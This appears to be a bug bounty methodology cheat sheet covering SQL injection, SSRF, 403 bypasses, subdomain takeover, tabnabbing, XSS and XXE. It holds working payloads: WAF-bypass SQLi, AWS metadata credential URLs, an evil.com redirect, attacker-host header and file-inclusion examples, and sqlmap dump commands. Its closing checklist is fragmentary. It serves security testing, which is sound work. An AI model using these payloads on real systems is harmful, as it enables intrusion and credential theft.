1. Using Null byte before SQL query.
%00' UNION SELECT password FROM Users WHERE username-'xyz'--

2. Using SQL inline comment sequence.
'/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/username
/**/LIKE/**/'xyz'--
3. URL encoding
for example :
/ URL encoded to %2f

* URL encoded to %2a
Can also use double encoding, if single encoding doesn't works. Use hex encoding if the rest doesn't
work.
4. Changing Cases (uppercase/lowercase)
- For more step wise detailed methods, go through the link below.
https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF
5. Use SQLMAP tamper scripts. It helps bypass WAF/IDS/IPS.
- Use Atlas. It helps suggesting tamper scripts for
SQLMAP. https://github.com/m4ll0k/Atlas
- JHaddix post on SQLMAP tamper scripts.
https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423
6. Time Delays :
Oracle dbms_pipe.receive_message(('a'),10)
Microsoft WAITFOR DELAY '0:0:10'
PostgreSQL SELECT pg_sleep(10)
MySQL SELECT sleep(10)
7. Conditional Delays :
Oracle SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN

'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual Microsoft
IF (YOUR-CONDITION-HERE) WAITFOR DELAY
'0:0:10'
PostgreSQL SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10)

ELSE pg_sleep(0) END
MySQL SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')
Resources and tools that will help gain an upper hand on finding bugs :
- Portswigger SQL Injection cheat sheet - https://portswigger.net/web-security/sql-

injection/cheat-sheet
- HTTPX - https://github.com/encode/httpx
- GF patterns - https://github.com/1ndianl33t/Gf-Patterns
- GF (Tomnomnom)- https://github.com/tomnomnom/gf
- We can also use gau with waybackurls to fetch all urls.
- Waybackurls - https://github.com/tomnomnom/waybackurls
- Gau - https://github.com/lc/gau
- Arjun - https://github.com/s0md3v/Arjun
- Hakcrawler - https://github.com/hakluke/hakrawler
* SSRF
What's SSRF ??
SSRF is a type of exploit where an attacker abuses the functionality of a server causing it to access or
manipulate information in the realm of that server that would otherwise not be directly accessible to the
attacker.
Where to look for ??
1.If you got Open Redirect try escalating it to SSRF.
2.gf SSRF to grep parameters may vulnerable to SSRF.
3.SSRF's are more in API's so crawl the whole web app with burp proxy turned on and search for
keywords like., eg :
?url=
?uri=
?req=
etc.....
Sign up with an Email like blabla.collaborator.net. If u receive HTTP req. in collaborator then its SSRF.
But if there's no impact Don't Report it :) DNS and SMTP req. Doesn't matters.
AWS Metadata
Most of the sites use AWS nowadays...
- AWS localhost is 169.254.169.254 so don't use 127.0.0.1 there!

- If you found an SSRF vulnerability that runs on EC2, try requesting :
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE
http://169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
Source: https://twitter.com/ADITYASHENDE17/status/1305051512335298562?
Escalation
SSRF can be Escalated to RCE :) [Impact High]
<os cmd>.collaborator.net (thehackerish has a good video in it :)
If there's no impact! on your SSRF rather than a redirect try to escalate it to XSS.
** Blind SSRF
Blind SSRF's are those that don't show enumerated data directly to the user and hence are known as
blind SSRF.
Different Methods:
Methodology #1:
Header Injection:
One way of finding them is by inserting your burp collaborator domain into the referrer header also
known as host header injection.
Snippet:
GET /HTTP 1.1

Host: site.tld
User Agent: Firefox
Referrer: https://your_collaborator_instance.com
Many organizations use services that analyse which url or service is referring the visitor to their site.
Execution of this type of attack depends upon the underlying service in my case the server was running
on an aws ec2 instance but i was unable to get to it's admin panel namely (192.168.192.168) as it was
only performing a lookup on me but not allowing anythng beyond that. Try it on different sites and
services that you come across you just might get lucky.
I will list more as i find if you have found any please kindly list them here so that other's beneift from it.
* SSTI
* Status_Code_Bypass
** 403 Bypass
403 Bypass
I am sharing all this tips and techniques from my own personal experience there no official references
for that
Directory Based
If you see directory with no slash at end then do these acts there
site.com/secret => 403

site.com/secret/* => 200
site.com/secret/./ => 200
File Base
If you see file without any slash at end then do these acts there
site.com/secret.txt => 403

site.com/secret.txt/ => 200
site.com/%2f/secret.txt/ => 200
Protocol Base
Well, sound wired but check out the example for better understanding
https://site.com/secret => 403

http://site.com/secret => 200
Payloads
/
/*
/%2f/
/./
./.
/*/
Header
?https://observationsinsecurity.com/2020/08/09/bypassing-403-to-get-access-to-an-admin-
console-endpoints/?
Tools
Here is a Tool I found on twitter.
?https://github.com/yunemse48/403bypasser
* Subdomain
Takeover Basics
DNS
When a web address is accessed eg. "www.xyz.com", a DNS query is performed across a DNS server
with the host name.
The DNS server takes the hostname and resolves it into a numeric IP address CNAME
An alias of domain name to another domain name
In the example below, xyz.company.com is a source domain and xyz.cloudservice.com is a canonical

domain name.
Subtakeover_basics
Subdomains map themselves to a specific IP, 3rd party services like Azure, AWS, Heroku, Github, Fastly,
Shopify, etc. to serve the contents. These subdomains use a CNAME record to another domain [eg.
xyz.company.com CNAME xyz.cloudservice.com]
Now due to whatever reason, the company decides to stop utilizing this service and to save some bucks,
the company cancels the subscription of the 3rd party cloud service provider.
But, the company forgets to update or simply remove the CNAME record in the DNS zone file
Since the CNAME record is not deleted from company.com DNS zone, anyone who registers
xyz.cloudservice.com has full control over xyz.company.com until the DNS record is present.
How to find subdomain takeover ?
1. Subdomain Enumeration
Use the following tools to enumerate subdomains
?Assetfinder?
?Subfinder?
?Findomain?
2. Checking for takeover

The following tools are designed to scan a list of subdomains concurrently and identify ones that are
able to be hijacked.
?Subjack?
?SubOver?
You can also verify if the subdomain is vulnerable or not by going through common error pages.
3. Hijacking the subdomain

Use the following github repositiory to check if the engine is vulnerable or not and the steps for
hijacking a particular engine.
?https://github.com/EdOverflow/can-i-take-over-xyz?
If you cannot find your engine in the above repository, Google is your friend ! Case :
CNAME available to buy
CNAME available to buy

There are cases when the CNAME that a subdomain points to, is available to buy. In that
case the attacker can directly buy that domain and host his/her content.
** Subdomain Takeover - Easy Method
1. Method by @Virdoex_hunter?
Easy Subdomain Takeover Method
Step:
?
1:Grab all subdomains of target. i.e, subfinder -d flaws.cloud | tee -a domains.txt

?
2:Run this one liner

?
3:cat domains.txt | while read domain;do dig $domain;done | tee -a digs.txt

?
4::Grab all the CNAME Entries i.e, cat digs.txt | grep CNAME
?
5:Find a domain that is pointed to third party domain like sub.exampple.com CNAME x.aws.com
?
6:Check wheather the main subdomain is down

?
7:Go to host provider where the domain is pointed to and register that domain if you registered congrats
you have takeover the subdomain.
2. Method by @WhoIs1nVok3r?
Step-1:- First of all collect all subdomain of the target using

assetfinder,subfinder,chaos(needs API key).
?
Step-2:- Next sort out duplicate URLs using -- cat unresolved | sort -u | tee -a resolved
?
Step-3:- Pass it to subzy,subjack or other subdomain-takeover tool -- using subzy tool

-- subzy -targets resolved , or use subjack
?
Step-4:- We can also use nuclei templates but we need to first use httpx -- cat resolved | httpx
| tee -a hosts
?
Step-5:- Next use nuclei-templates -- cat hosts | nuclei -t nuclei-templates/vulnerabilites -o nuclei.txt -v

?
Tools Used:-
?
https://github.com/projectdiscovery/nuclei
https://github.com/projectdiscovery/subfinder
https://github.com/projectdiscovery/httpx
https://github.com/projectdiscovery/nuclei-templates
https://github.com/projectdiscovery/chaos-client
https://github.com/haccer/subjack
https://github.com/LukaSikic/subzy
* Tabnabbing
Even though this vulnerability is rated by many bug bounty programs as a low severity bug, it is worth
looking for it as it is very easy to find.
More information about the vulnerability:

When tabnabbing, the attacker searches for links that are inserted into the website and are under his
control. Such links may be contained in a forum post, for example. Once he has found this kind of
functionality, it checks that the link's rel attribute does not contain the value noopener and the target
attribute contains the value _blank. If this is the case, the website is vulnerable to tabnabbing.
How to exploit:
1. Attacker posts a link to a website under his control that contains the following JS code:
window.opener.location = "http://evil.com"
2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
3. At the same time the JS code is executed and the background tab is redirected to the website
evil.com, which is most likely a phishing website.
4. If the victim opens the background tab again and doesn't look at the address bar, it may happen
that he thinks he is logged out, because a login page appears, for example.
5. The victim tries to log on again and the attacker receives the credentials
How to search for it:
As already mentioned, you have to search for the following link formats:
<a href="..." target="_blank" rel="" /> or

<a href="..." target="_blank" />
* WAF BYPASSES
** WAF Bypass Using Headers
WAF Bypass using Headers(Password reset poisoning) For
waf bypass, and similar
X-Forwarded-Host
X-Forwarded-Port
X-Forwarded-Scheme Origin:
nullOrigin: [siteDomain].attacker.com
X-Frame-Options: Allow
X-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
Proxy-Host: 127.0.0.1
Request-Uri: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Forward-For: 127.0.0.1
Base-Url: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Url: 127.0.0.1
Redirect: 127.0.0.1
Real-Ip: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Custom-IP-Authorization:127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Original-Url:
X-Forwarded-Server:
X-Host:
X-Forwarded-Host:
X-Rewrite-Url:
* Weak Password Policy

A weak password policy increases the probability of an attacker having success using brute force and
dictionary attacks against user accounts. An attacker who can determine user passwords can take over a
user's account and potentially access sensitive data in the application.
There are two ways in which this can be checked First
Way
- Check if you can use Password same as that of Email Address
- Check if you can use Username same as that of Email Address
- Try above mentioned when Resetting Password , Creating Account , Changing Password from
Account Settings
Second Way
- Check if you can use Password some Weak Passwords such as 123456, 111111 , abcabc ,
qwerty123
- Try above mentioned when Resetting Password , Creating Account , Changing Password from
Account Settings
- Applications usually have Restrictions on Password while Creating Account, Make sure you
check for both the cases when Resetting Password
* XSS
** Reflected Xss Methods

Many methods out in wild but here are few most common , but not limited.
One Awesome mind map for approach to reflected xss can be found here
https://github.com/A9HORA/Reflected-XSS-Mindmap Made By @A9HORA?
Tip: While using other methods put method 2 in background in terminal or on vps
1. Using Burp
Download Reflection and sentinal plugin for burp. Walk
and spider the target site.
Check the reflected params tab in burp send
that sentinal or check manually.
2. Using Waybackurls and other similar site

Use Gau or Wayback urls to passively gather urls of the target.
Filter the parameters using grep "=" or gf patterns and store it in a new file. Now
run Gxss or bxss on that new file.
Check Reflected Param Manually or use some tool like dalfox
3. Using Google Dorks

Using Google Dork site:target.com filter the result
Now search for links which have params by adding more dorks something like site:target.com
inurl:".php?" or site:target.com filetype:php etc
you can find some dorks at this link https://www.openbugbounty.org/blog/devl00p/top-100- xss-dorks/ or

google it out.
Check if the param value is getting reflected in html source code Try Xss
payload there or pass it to some tool
4. Find Hidden Variables In Source Code.

Check Javascript file or html Source file for hidden or unused variables
You can Manually Check Right Click View Page Source and search for var= , ="" , =''.
Now Append that to webpage urls. For example

https://example.com?hiddenvariablename=xss.
5. Other Methods
Use Methods 1 or 2 to Gather the urls
Enumerate the Firewall using https://github.com/Ekultek/WhatWaf or other similar tool.
Find WAF bypass payload on twitter by searching or in this Github Repo

https://github.com/0xInfection/Awesome-WAF?
Also Use Arjun to find hidden params. Tips
Check the error pages (404,403,..) sometimes they contain reflected values Trigger
a 403 by trying to get the .htaccess file
Try every reflected parameter
Video's
?https://www.youtube.com/watch?v=wuyAY3vvd9s?
?https://www.youtube.com/watch?v=GsyOuQBG2yM?
?https://www.youtube.com/watch?v=5L_14F-uNGk?
?https://www.youtube.com/watch?v=N3HfF6_3k94?
** Stored Xss Methods
Stored Xss are mostly found manually 1. Enumerate the Firewall using above Methods and select a
payload to test accordingly. 2. Try that selected WAF bypass payload while registering on a site in fields
like username, name, address, email, etc. 3. Try Payload in File name of profile picture and also in the
source file of image. 4. Try in Comment section anywhere on target site. 5. Try on every input fields
which get reflected in page and which can be seen by other users. 6. Try to signup using your name +
xss payload and that can lead to stored xss. Tips
For every input field

Try to get <a href=#>test</a> an entity in Try
to get an obfuscated entity in
If it catches on anything, go deeper Video's
?https://www.youtube.com/watch?v=uHy1x1NkwRU?
Writeup:
-https://medium.com/@fatin151485/how-i-found-my-first-stored-xss-on-popular-eboighar-
com-6bd497b0bb96?
** Blind Xss
Similar to Reflected Xss Or Stored Xss But you Dont get any reflection, but you get response on you
server.
Similar methods As given above except try putting payload which can give a callback on your server
when executed.
You can Used https://xsshunter.com/ or Use burpcollaborator or ngrok. Try it on
contact forms or similar functionality.
Tips
Copy every payload from your xsshunter payloads section and paste it into every field you see XSS
hunter contains a payload for CSP bypass
Generate some variations of your payloads (example replace < with <)
Where to look for Blind XSS……

1- Review forms
2- Contact Us pages
3- Passwords(You never know if the other side doesn’t properly handle input and if your password
is in View mode)
4- Address fields of e-commerce sites
5- First or Last Name field while doing Credit Card Payments
6- Set User-Agent to a Blind XSS payload. You can do that easily from a proxy such as Burpsuite.
7- Log Viewers
8- Feedback Page
9- Chat Applications
10- Any app that requires user moderation
** DOM XSS
Tips
Would not recommend manually looking for DOM XSS Burp
suite PRO scanner can find DOM XSS
Tool: https://github.com/dpnishant/ra2-dom-xss-scanner? Video's

?https://www.youtube.com/watch?v=gBqzzhgHoYg?
?https://www.youtube.com/watch?v=WclmtS8Ftc4? XSS filter
evasion tips
Tips
< and > can be replace with html entities < and >
You can try an XSS polyglot
javascript:/*-
-></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+ale
rt(1)//'>
?https://gist.github.com/michenriksen/d729cd67736d750b3551876bbedbe626? XSS
Firewall Bypass Techniques
Check if the firewall is blocking only lowercase
Ex:- <scRipT>alert(1)</scRipT>
Try to break firewall regex with the new line(\r\n)
Ex:- <script>%0alert(1)</script>
Try Double Encoding
Ex:- %2522
Testing for recursive filters, if firewall removes text in red, we will have clear payload
Ex:- <src<script>ipt>alert(1);</scr</script>ipt>
Injecting anchor tag without whitespaces
Ex:- <a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert(1)">
Try to bypass whitespaces using Bullet
Ex:- <svg•onload=alert(1)>
Try to change request method
Ex:- GET /?q=xss POST/

q=xss
Thanks To
?The XSS rat?

?sratarun?
Reference
?
https://github.com/heilla/SecurityTesting/blob/master/HuntingCheckList.md
** Automated XSS
Make sure you have Go installed on your Machine To
Install Go on your Machine:
sudo apt install -y golang export
GOROOT=/usr/lib/go export
GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH source
.bashrc
How to Hunt XSS using QuickXSS?
Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target Use GF
patterns to find XSS Vulnerable URL's
Use Dalfox to find XSS.
* XXE Methods
These are my methods to check and hunt for XML External Entities. I might be missing a lot of things but
as the community believe in "sharing is caring" by @CXVVMVII.
Methods
1. Convert the content type from "application/json"/"application/x-www-form-urlencoded" to

"applcation/xml".
2. File Uploads allows for docx/xlcs/pdf/zip , unzip the package and add your evil xml code into
the xml files.
3. If svg allowed in picture upload , you can inject xml in svgs.
4. If the web app offers RSS feeds , add your milicious code into the RSS.
5.Fuzz for /soap api , some applications still running soap apis
6.If the target web app allows for SSO integration, you can inject your milicious xml code in the SAML
request/reponse

Bug Bounty Methodology

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Bug Bounty Methodology

Uploaded by

Copyright:

Available Formats

* Special pages checklist

how it's handled)

allowed?(test for xss,ssti and csti)

%0d. How will it react to me providing myemail%00@email.com? It may read it as

myemail@email.com. Is it the same when signing up with their mobile app?

*** Can I sign up using @target.com or is it blacklisted? If yes to being blacklisted,

this? Always sign up using your targets email address.

relies on a .js file for each feature.

experience again) and Google robots indexes and remembers a LOT.

site:example.com inurl:register inurl:& site:example.com inurl:signup inurl:& site:example.com

*** Do they allow weak passwords?

** Login page (this includes the admin page):

always try the most common, in various upper/lower cases:

returnUrl, goto, return_url, returnUri, cancelUrl, back, returnTo

*** What happens if I try login with myemail%00@email.com - does it recognise it as

an account takeover. Do the same when claiming a username too

*** Brute-force credentials using a dictionary file.

*** Authentication Bypass

**** Use SQL injection to bypass authentication.

**** Default & Master OTP(e.g 0000,00000,000000,1234,12345,123456,1111,11111,111111)

**** Bypass Captcha by modifying response field

**** IDOR by modifying ID in response

**** Disclosure of OTP in response

*** Do they use remember me passwords?

** Reset change password page:

*** Check the workflow of password changing and resetting.

*** What information is required to reset/change a password?

** Updating account information:

token, or a token with the same length?

impact from XSS then this is something to consider.

but sometimes things can be overlooked. Leave no stone unturned.

as javascript:alert(0)? This is a key area I look for when setting up my profile.

is included in the CSP as it may still be useful.

<div id= example onclick= runjs( userinput&lt;&quot; ); >

But you could use );alert( example ); which results in:

<div id= example onclick= runjs( userinput );alert( example ); >

SSRF webhook and you ll see.

prove impact easier if we find a bug.

(The token should of not had permission to do anything!)

debugging/testing. Try theirdomain.com as the redirectUri as well popular CDNs such as

have to be running something on their machine)

options will be available depending on your country)

feature which may give you a window. Old code = bugs.

more features to play with!

You can find test numbers from sites such as

Common web page checklist

Headers (for example, cookie, URL referrer, and so on)

HTML controls (drop-down list, radio button, hidden input, textbox,

using Burp Target.

** Analyze the cookie/sessionID for randomness by sending it to the Burp Sequencer.

** Manipulate the cookie parameters (for example, change isAdmin=0 to isAdmin=1).

** What is the duration of the session timeout?

Security logic flaws

The contents of the hidden input controls

Disabled controls (for example, <input disabled="true" name="secret">)

1; wait for delay '0:15:0'--

Use SQL map to automate it:

$sqlmap -u http://[victim IP] --crawl=1

$sqlmap -u http://10.0.0.100/index.php?id=234 --dbms=mysql --dump --threads=7

and try to inject the following:

<script> alert(1) </script>

(for example, http://[victim domain]/page.php?file=http://[attackerdomain]/[infected page]).

** Version Or CVSS Investigation

<div id= example onclick= runjs( userinput<" ); >